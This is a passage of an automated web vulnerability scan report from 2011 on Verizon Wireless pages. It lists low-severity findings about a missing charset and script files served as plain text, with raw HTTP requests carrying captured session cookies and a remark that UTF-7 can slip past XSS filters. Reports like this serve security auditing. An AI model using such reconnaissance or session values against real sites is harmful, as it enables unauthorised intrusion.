Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203471|check#true#1310993931|session#1310993870949-319721#1310995731; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

query=item%3DphoneFirst%26action%3DviewPhoneDetail%26selectedPhoneId%3D5635%26go%3D%2Fstore%2Fcontroller%26&fd=&go=%2Fstore%2Fcontroller&zipcode=10010&rememberMyZip=&state=&prevstate=&change=&filter=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Mon, 18 Jul 2011 13:01:19 GMT
Location: http://www.verizonwireless.com:80/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Set-Cookie: CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 18-Jul-2011 13:21:19 GMT; path=/
Set-Cookie: ZIPCODE=10010; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
Set-Cookie: CITY=New York; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
Set-Cookie: STATE=NY; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 439

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.verizonwireless.com:80/
...[SNIP]...

6. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /trophy/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /trophy/ HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx?id=1685&np=1569-1684-1536-1537-1538-1568-1690-1685&WT.mpe=oHP-car
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1311781870|check#true#1310572330|session#1310572240370-41417#1310574130; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310569615.1; __utmz=96859928.1310569615.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000

Response

HTTP/1.1 200 OK
Server: None
Date: Mon, 18 Jul 2011 12:57:34 GMT
Content-type: text/html
Last-modified: Tue, 24 May 2011 02:03:42 GMT
Content-length: 125
Etag: "7d-4ddb11fe"
Accept-ranges: bytes

<html>
<head>
<meta http-equiv="refresh" content="0;URL=http://phones.verizonwireless.com/htc/trophy/" />
</head>
</html>

7. Content type incorrectly stated  previous
There are 5 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


7.1. http://www.verizonwireless.com/b2c/devicesController/interface/dwrChangeTermService.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verizonwireless.com
Path:   /b2c/devicesController/interface/dwrChangeTermService.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /b2c/devicesController/interface/dwrChangeTermService.js HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203471|check#true#1310993931|session#1310993870949-319721#1310995731; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:01:25 GMT
Content-Length: 661
Content-Type: text/plain
X-Powered-By: Servlet/2.5 JSP/2.1


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (dwrChangeTermService == null) v
...[SNIP]...

7.2. http://www.verizonwireless.com/b2c/devicesController/interface/dwrCompareService.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verizonwireless.com
Path:   /b2c/devicesController/interface/dwrCompareService.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /b2c/devicesController/interface/dwrCompareService.js HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=12&lid=//global//shop//phones+and+devices//tablets
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204559|session#1310993870949-319721#1310996819|check#true#1310995019; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:16:09 GMT
Content-Length: 1643
Content-Type: text/plain
X-Powered-By: Servlet/2.5 JSP/2.1


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (dwrCompareService == null) var
...[SNIP]...

7.3. http://www.verizonwireless.com/b2c/devicesController/interface/dwrDeviceDetailTabService.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verizonwireless.com
Path:   /b2c/devicesController/interface/dwrDeviceDetailTabService.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /b2c/devicesController/interface/dwrDeviceDetailTabService.js HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203471|check#true#1310993931|session#1310993870949-319721#1310995731; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:01:25 GMT
Content-Length: 905
Content-Type: text/plain
X-Powered-By: Servlet/2.5 JSP/2.1


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (dwrDeviceDetailTabService == nu
...[SNIP]...

7.4. http://www.verizonwireless.com/b2c/devicesController/interface/dwrSearchService.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verizonwireless.com
Path:   /b2c/devicesController/interface/dwrSearchService.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /b2c/devicesController/interface/dwrSearchService.js HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=12&lid=//global//shop//phones+and+devices//tablets
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204559|session#1310993870949-319721#1310996819|check#true#1310995019; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:16:09 GMT
Content-Length: 2121
Content-Type: text/plain
X-Powered-By: Servlet/2.5 JSP/2.1


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (dwrSearchService == null) var d
...[SNIP]...

7.5. http://www.verizonwireless.com/b2c/devicesController/interface/dwrSupportTabService.js  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verizonwireless.com
Path:   /b2c/devicesController/interface/dwrSupportTabService.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /b2c/devicesController/interface/dwrSupportTabService.js HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203471|check#true#1310993931|session#1310993870949-319721#1310995731; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:01:25 GMT
Content-Length: 463
Content-Type: text/plain
X-Powered-By: Servlet/2.5 JSP/2.1


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (dwrSupportTabService == null) v
...[SNIP]...

Report generated by XSS.CX at Mon Jul 18 08:45:18 CDT 2011.